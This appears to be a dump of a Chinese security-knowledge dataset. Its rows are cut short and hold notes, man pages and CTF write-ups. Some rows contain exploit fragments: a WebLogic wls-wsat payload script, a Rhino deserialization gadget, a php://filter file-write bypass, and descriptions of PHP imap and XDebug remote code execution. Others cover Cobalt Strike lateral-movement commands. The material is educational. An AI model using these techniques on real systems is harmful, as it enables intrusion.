text
stringlengths
100
9.93M
category
stringclasses
11 values
# 深入理解堆的实现 仔细想一下,任何堆的实现都需要从以下两个角度考虑相应的问题 - 宏观角度 - 创建堆 - 堆初始化 - 删除堆 - 微观角度 - 申请内存块 - 释放内存块 当然,这些都是比较高层面的想法,不同的堆的底层实现会有所不同。
sec-knowleage
.TH MINGETTY 8 "6 Apr 1996" "Debian-Local" "Linux Programmer's Manual" .SH NAME mingetty \- 控制台最小的 getty .SH 总览 SYNOPSIS .B mingetty [\-\-noclear] [\-\-nonewline] [\-\-noissue] [\-\-nohangup] [\-\-nohostname] [\-\-long\-hostname] [\-\-loginprog=/bin/login] [\-\-nice=10] [\-\-delay=5] [\-\-chdir=/home] [\-\-chroot=/chro...
sec-knowleage
import java.rmi.RemoteException; import java.rmi.server.UnicastRemoteObject; import java.util.List; public class Calc extends UnicastRemoteObject implements ICalc { public Calc() throws RemoteException { super(64000); } public Integer sum(List<Integer> params) throws RemoteException { Inte...
sec-knowleage
package org.vulhub.fastjsondemo; import com.alibaba.fastjson.serializer.SerializerFeature; import com.alibaba.fastjson.support.config.FastJsonConfig; import com.alibaba.fastjson.support.spring.FastJsonHttpMessageConverter; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure...
sec-knowleage
time === 统计给定命令所花费的总时间 ## 补充说明 `time` 命令是用来确定一个给定的命令需要运行多长时间。它对于测试你的脚本和命令的性能很有用。 例如,如果你有两个不同的脚本在做同样的工作,你想知道哪一个表现得更好,你可以用 Linux 的时间命令来确定每个脚本的执行时间。 该指令是 shell 内指令,也是一个软件包,**对于软件包的说明在这篇文档靠下的部分** ## 语法 ```shell time <指令> ``` ## 参数 指令:指定需要运行的额指令及其参数。 ## 实例 当测试一个程序或比较不同算法时,执行时间是非常重要的,一个好的算法应该是用时最短的。所有类UNIX系统都包含time命令,使用这个命令可...
sec-knowleage
data = [0x7a, 0xe5, 0x85, 0x02, 0x22, 0xb8, 0x2d, 0x4f, 0x3d, 0x29, 0x00, 0xf9, 0x13, 0x37, 0xaf, 0x79, 0x10, 0x2e, 0x27, 0x16, 0x6e, 0x3e, 0x27, 0x6d, 0x0d, 0xab, 0x72, 0x58, 0x2c, 0x42, 0x95, 0x2c, 0x72, 0xd3, 0x88, 0x9b, 0x11, 0x0d, 0xe1, 0xf0, 0x58, 0xa0, 0x98, 0xd1, 0x79, 0x23, 0x05, 0x35, 0x37, 0xd0, 0x46, 0x71, ...
sec-knowleage
jed === 主要用于编辑代码的编辑器 ## 补充说明 **jed命令** 是由Slang所开发,其主要用用途是编辑程序的源代码。它支持彩色语法加亮显示,可以模拟emacs,EDT,wordstar和Brief编辑器。 ### 语法 ```shell jed(选项)(参数) ``` ### 选项 ```shell -2:显示上下两个编辑区; -batch:以批处理模式来执行; -f<函数>:执行Slang函数; -g<行数>:移到缓冲区中指定的行数; -i<文件>:将指定的文件载入缓冲区; -n:不要载入jed.rc配置文件; -s<字符串>:查找并移到指定的字符串。 ``` ### 参数 文件:指定待编辑的文件列表。 ##...
sec-knowleage
cu === 用于连接另一个系统主机 ## 补充说明 **cu命令** 用于连接另一个系统主机。cu(call up)指令可连接另一台主机,并采用类似拨号终端机的接口工作,也可执行简易的文件传输作业。 ### 语法 ```shell cu [dehnotv][-a<通信端口>][-c<电话号码>][-E<脱离字符>][-I<设置文件>][-l<外围设备代号>] [-s<连线速率>][-x<排错模式>][-z<系统主机>][--help][-nostop][--parity=none][<系统主机>/<电话号码>] ``` ### 选项 ```shell -a<通信端口>或-p<通信端口>或--port<通信端口> 使用指定的通信...
sec-knowleage
# New Caesar Category: Crypto, 60 points ## Description > We found a brand new type of encryption, can you break the secret code? (Wrap with picoCTF{}) > > `kjlijdliljhdjdhfkfkhhjkkhhkihlhnhghekfhmhjhkhfhekfkkkjkghghjhlhghmhhhfkikfkfhm` A Python file was attached: ```python import string LOWERCASE_OFFSET = ord("a") A...
sec-knowleage
## Colors (ppc/Programming, 100p) ### PL Version `for ENG version scroll down` System wyświetlał na stronie internetowej obrazek złożony z kwadratów. Wsystkie kwadraty oprócz jednego miały taki sam kolor - jeden z nich miał lekko inny odcień. Celem zadania było kliknięcie w ten odmienny kwadrat. System rejestrował gdzi...
sec-knowleage
### PWN关于Change Others概述 如果我们可以改变特权进程的执行轨迹,也可以实现提权。这里我们从以下角度来考虑如何改变特权进程的执行轨迹。 - 改数据 - 改代码 ### Change Others基于改数据的方法介绍之符号链接 如果一个 root 权限的进程会执行一个符号链接的程序,并且该符号链接或者符号链接指向的程序可以由攻击者控制,攻击者就可以实现提权。 ### Change Others基于改数据的方法介绍之call_usermodehelper `call_usermodehelper` 是一种内核线程执行用户态应用的方式,并且启动的进程具有 root 权限。因此,如果我们能够控制具体要执行的应用,那就可...
sec-knowleage
--- title: Emmet date: 2020-12-14 18:28:43 background: bg-[#95c844] tags: - snippets - coding - html - css - abbr categories: - Toolkit intro: | [Emmet](https://emmet.io/) is a web-developer’s toolkit for boosting HTML & CSS code writing, which allows you to write large HTML code blocks at s...
sec-knowleage
.\" Copyright (c) 1993 Michael Haardt (michael@moria.de), Fri Apr 2 11:32:09 MET DST 1993 .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your...
sec-knowleage
## rhinoxorus (pwn, 500p, ? solves) Dostajemy program i analizujemy go. Po uruchomieniu wczytuje on zawartość pliku password.txt do zmiennej globalnej, i zaczyna nasłuchiwać na porcie 24242 i forkuje się dla każdego połączenia. Każdy fork wczytuje 256 bajtów od usera i wywołuje jakąś funkcję z globalnej tablicy funkcji...
sec-knowleage
### 64位程序格式化字符串漏洞原理 其实 64 位的偏移计算和 32 位类似,都是算对应的参数。只不过 64 位函数的前 6 个参数是存储在相应的寄存器中的。那么在格式化字符串漏洞中呢?虽然我们并没有向相应寄存器中放入数据,但是程序依旧会按照格式化字符串的相应格式对其进行解析。 ### hijack GOT原理 在目前的 C 程序中,libc 中的函数都是通过 GOT 表来跳转的。此外,在没有开启 RELRO 保护的前提下,每个 libc 的函数对应的 GOT 表项是可以被修改的。因此,我们可以修改某个 libc 函数的 GOT 表内容为另一个 libc 函数的地址来实现对程序的控制。比如说我们可以修改 printf 的 got...
sec-knowleage
# 0x00 简介 横向渗透中Cobalt Strike给我们提供了 `psexec` `win` `winrm` 但是只是部分功能 顺便介绍下这几个工具。 ### psexec >1、通过ipc$连接,然后释放psexesvc.exe到目标机器。 2、通过服务管理SCManager远程创建psexecsvc服务,并启动服务。 3、客户端连接执行命令,服务端启动相应的程序并执行回显数据。 Cobalt Strike 中提供2种psexec 用法 ``` beacon> help psexec Use: psexec [host] [share] [listener] Spawn a session on a remote host....
sec-knowleage
version: '2' services: web: image: vulhub/imagemagick:7.0.8-20-php command: php -t /var/www/html -S 0.0.0.0:8080 volumes: - ./index.php:/var/www/html/index.php ports: - "8080:8080"
sec-knowleage
# PHP imap 远程命令执行漏洞(CVE-2018-19518) php imap扩展用于在PHP中执行邮件收发操作。其`imap_open`函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置`-oProxyCommand=`来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 参考链接: - https://bugs.php.net/bug.php?id=77153 - https://github.com/Bo0oM/PHP_imap_ope...
sec-knowleage
# T1564-001-linux-隐藏文件和目录 ## 来自ATT&CK的描述 为了防止普通用户误操作更改系统上的特殊文件,大多数操作系统都具有“隐藏”文件的概念。当用户使用GUI浏览文件系统或在命令行上使用普通命令时,这些文件不会显示。用户必须明确要求通过一系列图形用户界面(GUI)提示或命令行查看隐藏文件。例如(windows下的dir /a,linux或MAC下的ls -a命令等) 攻击者可以利用这一点来隐藏系统中任何位置的文件和文件夹,以便持久化并逃避不进行隐藏文件分析的用户或分析师。 linux/mac 用户可以将特定文件标记为隐藏,只需将“.”作为文件或文件夹名称中的第一个字符。默认情况下,以点“.”开头的文件和文件夹...
sec-knowleage
# Reverse --- **教程实验** - [如何开始学习逆向以及分析恶意软件?](https://www.freebuf.com/articles/rookie/178382.html) **相关资源** - [MicrosoftDocs/sdk-api](https://github.com/MicrosoftDocs/sdk-api) - windows sdk-api 的官方文档 **CTF writup** - [re学习笔记(1) BUUCTF-re xor](https://blog.csdn.net/palmer9/article/details/102784520) - [「不一样的 flag」 题解](ht...
sec-knowleage
# Hello Redux ### 环境配置 这里我们使用`create-react-app`快速创建一个 React 应用环境 ``` create-react-app react-redux-demo ``` **装包** 安装我们需要的`redux`包和`react-redux`包 ``` npm i redux react-redux -S ``` ### 调整结构 1. 修改`src`内容,在App组建内显示`Hello Word` 2. 在项目文件夹下的`src`中,创建两个组件`CommentBox`和`PostBody`。 3. 挂载在`App`组件上。
sec-knowleage
--- title: ISO 639-1 Language Code date: 2022-01-11 17:21:54 tags: - code - i18n - language categories: - Other intro: | This is a list of the ISO language codes that conform to the ISO 639-1 standard, it provide reference for multi-language website. --- Getting Started {.cols-2} --------------- ###...
sec-knowleage
# MySQL大小写问题 **MySQL 查询是不区分大小写的** Mysql 默认的字符检索策略: - utf8_general_ci,表示不区分大小写; - utf8_general_cs表示区分大小写 - utf8_bin 表示二进制比较,同样也区分大小写 。(注意:在 Mysql5.6.10 版本中,不支持 utf8_genral_cs!!!!) 创建表时,直接设置表的 collate 属性为 utf8_general_cs 或者 utf8_bin;如果已经创建表,则直接修改字段的Collation 属性为 utf8_general_cs 或者 utf8_bin。 --- **测试** 新建一个表 test1 ,字段 tex...
sec-knowleage
# Introduction 我们从隔离、访问控制、异常检测、随机化这四种方式来介绍内核中的防御机制。 ## 参考 - https://linuxplumbersconf.org/event/7/contributions/775/attachments/610/1096/Following_the_Linux_Kernel_Defence_Map.pdf - https://github.com/a13xp0p0v/linux-kernel-defence-map - https://outflux.net/slides/2018/lca/kspp.pdf - https://www.kernel.org/doc/html/lat...
sec-knowleage
# Sqlmap <p align="center"> <img src="../../../assets/img/logo/Sqlmap.png" width="25%"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/sqlmapproject/sqlmap **文章 & Reference** - [Sqlmap使用教程[个人笔记精华整理] | 漏洞人生](http://www.vuln.cn/1992) - [sqlmap用户手册[续]](http://dr...
sec-knowleage
# XDebug 远程调试漏洞(代码执行) XDebug是PHP的一个扩展,用于调试PHP代码。如果目标开启了远程调试模式,并设置`remote_connect_back = 1`: ``` xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 ``` 这个配置下,我们访问`http://target/index.php?XDEBUG_SESSION_START=phpstorm`,目标服务器的XDebug将会连接访问者的IP(或`X-Forwarded-For`头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PH...
sec-knowleage
.de Sh \" Subsection .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \" List item .br .ie \\n(.$>=3 .ne \\$3 .el .ne 3 .IP "\\$1" \\$2 .. .TH "NMBD" 8 "" "" "" .SH NAME nmbd \- 向客户端提供构造在IP之上的NetBIOS名字服务的NetBIOS名字服务器 .SH "总览 SYNOPSIS" \fBnmbd\f...
sec-knowleage
## danklang (re, 100p) > if you see this task while scroling > > you have been visited by the reversing task of the 9447 ctf > good flags and points will come to you > > but only if you submit '9447{`dankcode main.dc`}' to this task. > > [main.dc](main.dc) ###PL [ENG](#eng-version) Przepełnione memami zadanie (co wida...
sec-knowleage
# 威胁情报的生命周期 <img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200814121735.png" style="zoom:50%;" /> 图:威胁情报的生命周期[1] ## 一个中心 > Plan(企业威胁情报计划):这里的Plan实际上是指安全管理团队针对威胁情报所指定的情报计划,情报计划应包括威胁情报对应的安全风险点(包括但不限于业务安全、IT资产安全)、对应情报大类(包括但不限于战术情报、战略情报、运营情报、二次生产情报)、情报小类(包括但不限于pDNS情报、Whois情报、钓鱼网站情报、黑产情报)以及闭环跟进流程。一套完整的情报...
sec-knowleage
# Suricata <p align="center"> <img src="../../../assets/img/logo/Suricata.png" width="22%"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **官网** - https://suricata-ids.org/ **项目地址** - https://github.com/OISF/suricata **简介** Suricata 是由 OISF(开发信息安全基金会)开发,它也是基于签名,但是集成了创新的技术。该引擎嵌入了一个 HTTP 规...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH YES 1 2022年9月 "GNU coreutils 9.1"...
sec-knowleage
# Can You Hear Me? Category: Forensics, 50 Points ## Description > I think I heard something. I'm pretty sure it was around 3:00 pm... A binary file was attached. ## Solution Let's check the binary file: ```console root@kali:/media/sf_CTFs/matrix/Can_You_Hear_Me# file Can_You_Hear_Me Can_You_Hear_Me: data root@kali:/me...
sec-knowleage
### 堆利用介绍 在该章节中,我们会按照如下的步骤进行介绍 1. 介绍我们所熟知的动态内存分配的堆的宏观操作 2. 介绍为了达到这些操作所使用的数据结构 3. 介绍利用这些数据结构实现堆的分配与回收的具体操作 4. 由浅入深地介绍堆的各种利用技巧。 对于不同的应用来说,由于内存的需求各不相同等特性,因此目前堆的实现有很多种,具体如下 ```text dlmalloc – General purpose allocator ptmalloc2 – glibc jemalloc – FreeBSD and Firefox tcmalloc – Google libumem – Solaris ``` 这里我们主要以 glib...
sec-knowleage
parted === 磁盘分区和分区大小调整工具 ## 补充说明 **parted命令** 是由GNU组织开发的一款功能强大的磁盘分区和分区大小调整工具,与fdisk不同,它支持调整分区的大小。作为一种设计用于Linux的工具,它没有构建成处理与fdisk关联的多种分区类型,但是,它可以处理最常见的分区格式,包括:ext2、ext3、fat16、fat32、NTFS、ReiserFS、JFS、XFS、UFS、HFS以及Linux交换分区。 ### 语法 ```shell parted(选项)(参数) ``` ### 选项 ```shell -h:显示帮助信息; -i:交互式模式; -s:脚本模式,不提示用户; -v:显示版本号。...
sec-knowleage
import Utils.Gadgets; import Utils.Reflections; import org.mozilla.javascript.*; import org.mozilla.javascript.tools.shell.Environment; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Method; import java.util.Hashtable; import java.util.Map; @SuppressWarnings("unchecked") publi...
sec-knowleage
from crypto_commons.netcat.netcat_commons import nc, send, receive_until_match from crypto_commons.oracle.lsb_oracle import lsb_oracle def oracle(s, payload): send(s, 'l') receive_until_match(s, "\:\>\>", None) send(s, str(payload)) send(s, str(1)) send(s, str(1)) data = receive_until_match(s,...
sec-knowleage
--- title: EC2 所面临的风险 --- <center><h1>EC2 所面临的风险</h1></center> --- ## 1、凭证泄露 云场景下的凭证泄露可以分成以下几种: - 控制台账号密码泄露,例如登录控制台的账号密码 - 临时凭证泄露 - 访问密钥泄露,即 AccessKeyId、SecretAccessKey 泄露 - 实例登录凭证泄露,例如 AWS 在创建 EC2 生成的证书文件遭到泄露 对于这类凭证信息的收集,一般可以通过以下几种方法进行收集: - Github 敏感信息搜索 - 反编译目标 APK、小程序 - 目标网站源代码泄露 ## 2、元数据 元数据服务是一种提供查询运行中的实例内元数据的服务,当...
sec-knowleage
from __future__ import print_function from builtins import input import requests import sys url_in = sys.argv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&amp;", '"': "&quot;"...
sec-knowleage
.TH AT 1 "Nov 1996" local "Linux Programmer's Manual" .SH NAME at, batch, atq, atrm \- 排队、检查或删除以后要执行的作业。 .SH 总览 .B at .RB [-V] .RB [-q .IR 队列] .RB [-f .IR 文件] .RB [-mldbv] .B 时间 .B "at -c" .I 作业 .RI [作业...] .B atq .RB [-V] .RB [-q .IR 队列] .RB [-v] .br .B atrm .RB [-V] .I 作业 .RI [作业...] .br .B batch .RB [-V] .RB [-q ...
sec-knowleage
# We have a liftoff! (1/5) Category: Innovation ## Description > Welcome cadets! > > This is the mission's captain speaking, We are thrilled that you have joined us on this important mission to find extraterrestrial life. > > Sit back and enjoy the ride - your spaceship's kitchen is equipped with cookies and coffee. ...
sec-knowleage
# 二十二、资源 + OnlineTraining + [WebApplication Exploits and Defenses](https://google-gruyere.appspot.com) + [The Exploit Database](https://www.exploit-db.com/) + [Udacity](https://cn.udacity.com/) + Bug Bounty Platforms + [Hackerone.com](https://Hackerone.com) + [Bugcrowd.com](https://bugcrowd.com/) + [Synack....
sec-knowleage
'\"t .\" @(#)lilo.8 1.0 950728 aeb .\" This page is based on the lilo docs, which carry the following .\" COPYING condition: .\" .\" LILO program code, documentation and auxiliary programs are .\" Copyright 1992-1994 Werner Almesberger. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms...
sec-knowleage
# Bug Hunting Methodology and Enumeration ## Summary * [Passive Recon](#passive-recon) * Shodan * Wayback Machine * The Harvester * Github OSINT * [Active Recon](#active-recon) * [Network discovery](#network-discovery) * [Web discovery](#web-discovery) * [Web Vulnerabilities](#looking-for-web-vulnerabilitie...
sec-knowleage
# TokyoWesterns 2020 ### Table of contents * [`easy_hash` (crypto/warmup)](easy_hash) * [`sqrt` (crypto)](https://ctftime.org/writeup/23620) * [`twin-d` (crypto)](https://ctftime.org/writeup/23632) * [The Melancholy of Alice (crypto)](https://ctftime.org/writeup/23633) * [urlcheck v1 (web)](https://bonusplay.pl/writeup...
sec-knowleage
# 组策略 --- **组策略的概念** 组策略(英语:Group Policy)是微软 Windows NT 家族操作系统的一个特性,它可以控制用户帐户和计算机帐户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非域的计算机上管理组策略对象。 通过使用组策略,你可以设置策略设置一次,然后将该设置复制到多台计算机上。 例如,你可以在链接到域的 GPO 中设置多个 Internet Explorer11 安全设置,然后将所有这些设置应用到域中的每台计算机。 根据作用范围不同组策略可划分为多种,并且拥有自己的执行...
sec-knowleage
# XStream 反序列化命令执行漏洞(CVE-2021-21351) XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用`javax.naming.ldap.Rdn$RdnEntry`及`javax.sql.rowset.BaseRowSet`构造JNDI注入,进而执行任意命令。 参考链接: - https://x-stream.github.io/CVE-2021-21351.html - https://paper.seeb...
sec-knowleage
# DevGuru 1 > https://download.vulnhub.com/devguru/devguru.ova.7z 靶场IP:`192.168.32.224` 扫描对外端口服务 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -p 1-65535 -sV 192.168.32.224 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 01:23 EDT Nmap scan report for 192.168.32.224 Host is up (0.00096s latency). Not shown: 65532 clo...
sec-knowleage
# Challenge 2 Worked with AvivC, YaakovC. ## Description After finishing [Challenge 1](Challenge1.md) and extracting the encrypted PCAP file, we can start Challenge 2. At some point the creators uploaded a new version of `decrypt.rar.rar` with the following `README` file: > After opening challenge2.pcap.rar, please sen...
sec-knowleage
# Drupal 远程代码执行漏洞(CVE-2019-6339) * 影响软件:Drupal * 方式:phar反序列化RCE * 参考链接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) * 效果:任意命令执行 ## 漏洞环境 执行如下命令启动drupal 8.5.0的环境: ```bash docker compose up -d ``` 环境启动后,访问 `http://your-ip:8080/` 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。 ## 漏洞复现 如下图所...
sec-knowleage
# JWT - JSON Web Token > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. ## Summary - [Summary](#summary) - [Tools](#too...
sec-knowleage
# Close primes (PPC, 136p, 34 solved) In the challenge we can connect to the server and it provides us with a task. We're supposed to send 512 bit prime `p` such that with the next prime `q` it will have the property that: `sqrt(q) - sqrt(p) >= 0.0000000000000000000000000000000000000000000000000000000000000000000000000...
sec-knowleage
# T1596-003-搜索开放的技术数据库-数字签名 ## 来自ATT&CK的描述 在入侵受害者之前,攻击者可以在公开的数字证书数据中搜索可在目标确定期间使用的有关受害者的信息。数字证书由证书颁发机构(CA)颁发,以加密方式验证签名内容的来源。这些证书,例如用于加密Web流量(HTTPS SSL / TLS通信)的证书,包含有关注册组织的信息,例如名称和位置。 攻击者可以搜索数字证书数据以收集可操作的信息。威胁方可以使用在线资源和查找工具来收集有关证书的信息(引自:SSLShopper Lookup) 。数字证书数据也可以从组织签名的工件中获得(例如:加密的网络流量中使用的证书随内容一起提供)(引自:Medium SSL Cert...
sec-knowleage
## 5. 中介者(Mediator) ### Intent 集中相关对象之间复杂的沟通和控制方式。 ### Class Diagram - Mediator:中介者,定义一个接口用于与各同事(Colleague)对象通信。 - Colleague:同事,相关对象 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/30d6e95c-2e3c-4d32-bf4f-68128a70bc05.png"/> </div><br> ### Implementation Alarm(闹钟)、CoffeePot(咖啡壶)...
sec-knowleage
# SpringBoot Actuator未授权访问漏洞 ## 简介 Spring Boot Actuator是Spring Boot项目中的一个模块,它提供了一组用于监控和管理Spring Boot应用程序的端点。这些端点可以用来检索应用程序的运行状态、查看应用程序的统计数据、查看应用程序中的配置信息等。 此外,还可以使用Actuator执行一些安全操作,如关闭应用程序。使用Actuator可以更好的监控、管理和维护Spring Boot应用程序。 其中以下是它端点: | Http | 路径 | 描述 ...
sec-knowleage
# Jupyter Notebook 未授权访问漏洞 ## 漏洞描述 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员未为 Jupyter Notebook 配置密码,将导致未授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。 ## 环境搭建 ``` version: '2' services: web: image: vulhub/jupyter-notebook:5.2.2 command: start-notebook.sh --NotebookApp.token='' po...
sec-knowleage
tempfile === shell中给临时文件命名 ## 补充说明 有时候在写Shell脚本的时候需要一些临时存储数据的才做,最适合存储临时文件数据的位置就是`/tmp`,因为该目录中所有的内容在系统重启后就会被清空。下面是两种方法为临时数据生成标准的文件名。 ### tempfile命令 `tempfile命令`只有在基于Debian的发行版中才默认自带,比如Ubuntu,其他发行版没有这个命令。 用tempfile命令为一个临时文件命名: ```shell temp_file_name=$(tempfile) ``` 用一个加带了随机数的文件名作为临时文件命名: ```shell temp_file_name="/tmp/f...
sec-knowleage
# Level06 #### About The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. #### Source code There is no source code available for this level #### Solutions ``` sed -n '37 p' /etc/pass...
sec-knowleage
# Leetcode 题解 - 动态规划 <!-- GFM-TOC --> * [Leetcode 题解 - 动态规划](#leetcode-题解---动态规划) * [斐波那契数列](#斐波那契数列) * [1. 爬楼梯](#1-爬楼梯) * [2. 强盗抢劫](#2-强盗抢劫) * [3. 强盗在环形街区抢劫](#3-强盗在环形街区抢劫) * [4. 信件错排](#4-信件错排) * [5. 母牛生产](#5-母牛生产) * [矩阵路径](#矩阵路径) * [1. 矩阵的最小路径和](#1-矩阵的最小路径和) ...
sec-knowleage
# Web ## 签到 略 --- ## php审计 ```php <?php $content = '<?php exit(0);?>'; $content .= @$_POST['code']; $filename = @$_POST['filename']; if (isset($filename)){ file_put_contents($filename, $content); }else{ echo "今天天气不错"; } ?> ``` 通过 base64 绕过 `<?php exit(0);?>` ``` code=PD9waHAgcGhwaW5mbygpID8+&filename=php://filter/wri...
sec-knowleage
df === 显示磁盘的相关信息 ## 补充说明 **df命令** 用于显示磁盘分区上的可使用的磁盘空间。默认显示单位为KB。可以利用该命令来获取硬盘被占用了多少空间,目前还剩下多少空间等信息。 ### 语法 ```shell df(选项)(参数) ``` ### 选项 ```shell -a或--all:包含全部的文件系统; --block-size=<区块大小>:以指定的区块大小来显示区块数目; -h或--human-readable:以可读性较高的方式来显示信息; -H或--si:与-h参数相同,但在计算时是以1000 Bytes为换算单位而非1024 Bytes; -i或--inodes:显示inode的信息; -k...
sec-knowleage
# T1027-003-win-Ping Hex IP ## 来自ATT&CK的描述 攻击者可能试图通过加密,编码或其他方式混淆可执行文件或文件在系统中或传输中的内容,从而使其难以发现或分析。这是常见的行为,可以跨不同的平台和网络使用,用于逃避追踪。 有效载荷可能被压缩,存档或加密,以避免被检测到。这些有效载荷可以在“初始访问”期间或以后使用,以减轻检测。有时,可能需要用户采取行动才能打开和反混淆/解码文件信息以供用户执行。可能还要求用户输入密码以打开由攻击者提供的受密码保护的压缩/加密文件。攻击者也可以使用压缩或存档脚本,例如Javascript。 还可以对文件的某些部分进行编码以隐藏纯文本字符串,否则它们将有助于防御者发现。有效...
sec-knowleage
--- title: 更新日志 --- <center><h1>CF 更新日志</h1></center> ## [v0.5.0](https://github.com/teamssix/cf/releases/tag/v0.5.0) 2023.7.1 ### 新增功能 * [#227](https://github.com/teamssix/cf/pull/227) 新增阿里云用户数据后门功能 * [#228](https://github.com/teamssix/cf/pull/228) 新增阿里云镜像共享功能 * [#231](https://github.com/teamssix/cf/pull/231) 新增阿里云接管控...
sec-knowleage
# 流密码 流密码一般逐字节或者逐比特处理信息。一般来说 - 流密码的密钥长度会与明文的长度相同。 - 流密码的密钥派生自一个较短的密钥,派生算法通常为一个伪随机数生成算法。 需要注意的是,流加密目前来说都是对称加密。 伪随机数生成算法生成的序列的随机性越强,明文中的统计特征被覆盖的更好。 流密码加解密非常简单,在已知明文的情况下,可以非常容易地获取密钥流。 流密码的关键在于设计好的伪随机数生成器。一般来说,伪随机数生成器的基本构造模块为反馈移位寄存器。当然,也有一些特殊设计的流密码,比如 RC4。
sec-knowleage
### 下载内核方式 我们可以从 `https://www.kernel.org` 下载想要的内核。根据 https://www.kernel.org/category/releases.html,我们可以知道内核主要有以下几种类别: - Prepatch - Mainline - Stable - Longterm 这里我们选择长期支持版。 下面为了方便介绍,我们使用 `5.4` 版本,内核开发者会一直支持这个版本到 2025 年 12 月份。进一步地,我们选择 5.4 的最新版本 5.4.98(2021 年 2 月记录)。为了加速,我们可以选择就近的源来下载内核,这里使用清华源:https://mirrors.tuna.tsin...
sec-knowleage
# T1119-win-Seatbelt自动收集信息 ## 来自ATT&CK的描述 一旦在系统或网络中建立立足点,攻击者就可以使用自动化技术来收集内部信息。执行此技术的方法可以包括使用命令和脚本解释器来搜索和复制适合标准的信息(指符合攻击者收集的数据),例如在特定时间间隔的文件类型,位置或名称。此功能也可以内置到远程访问工具中。 该技术可以结合使用其他技术,例如文件和目录发现以及横向工具传输,以识别和移动文件。 ## 测试案例 Seatbelt是一个C#项目,可以用来对主机进行安全检查,在进攻和防御的角度都能发挥作用。 通过一条命令,就能够获得当前主机的多项配置信息,方便实用。 在实际渗透测试环境中可以利用Seatbelt工具做一些...
sec-knowleage
# T1588-006-获取能力-漏洞 ## 来自ATT&CK的描述 攻击者可能会获得有关漏洞的信息,这些信息可以在确定攻击目标的方法时使用。漏洞是计算机硬件或软件中的一个弱点,它有可能被攻击者利用,导致发生非预期或意料之外的行为。攻击者可以通过搜索开放的漏洞数据库或进入封闭的漏洞数据库来寻找漏洞信息。 攻击者可以监视漏洞披露数据库,以了解现有的以及新发现的漏洞状况。在发现漏洞和公开漏洞之间通常会有延迟。攻击者可能会把那些已知存在漏洞的系统作为目标(包括商业供应商)。对漏洞的了解可能会使攻击者寻找现有的漏洞或试图自己挖掘出一个漏洞。 ## 测试案例 暂无 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检...
sec-knowleage
# 0x00 Elevate 在Cobalt Strike中内置了3种提权模式 1. ms14-058是一个(过时的)权限升级漏洞利用程序,可用于未打补丁的Windows 7系统提权。 2. UAC DLL是一种绕过UAC的攻击,它试图将本地管理员运行的有效负载从低权限提升到高权限。此攻击使用UAC漏洞将ArtifactKit生成的DLL复制到特权位置。此攻击适用于Windows7和Windows8及更高版本的未修补版本。 3. uac-token-duplication是另一种绕过UAC的攻击,将其从低权限提升到高权限(作为本地管理员)。这种攻击使用一个UAC漏洞,允许非提升进程使用从提升进程中窃取的令牌启动任意进程。此漏洞要求攻...
sec-knowleage
#!/usr/bin/env python """Simple HTTP Server With Upload. This module builds on BaseHTTPServer by implementing the standard GET and HEAD requests in a fairly straightforward manner. """ __version__ = "0.1" __all__ = ["SimpleHTTPRequestHandler"] __author__ = "bones7456" __home_page__ = "http://li2z.cn/" import os im...
sec-knowleage
# T1505-003-webshell-冰蝎 ## 来自ATT&CK的描述 Webshell是一个Web脚本,放置在可公开访问的Web服务器上,允许攻击者将Web服务器用作网络的网关。 Web shell可以提供多种功能,如虚拟终端、文件管理、数据库连接等。 除了服务器端脚本之外,Webshell可能还有一个客户端接口程序,用于与管理Web服务器的通信(例如,中国菜刀、C刀、蚁剑、冰蝎等)。 ## 测试案例 暂无,可自行本地测试; ## 检测日志 HTTP流量 ## 测试复现 暂无,建议自行本地测试; ## 测试留痕 暂无,建议本地自行测试,抓取流量数据; ## 检测规则/思路 ### suricata规则 参考来源:<https...
sec-knowleage
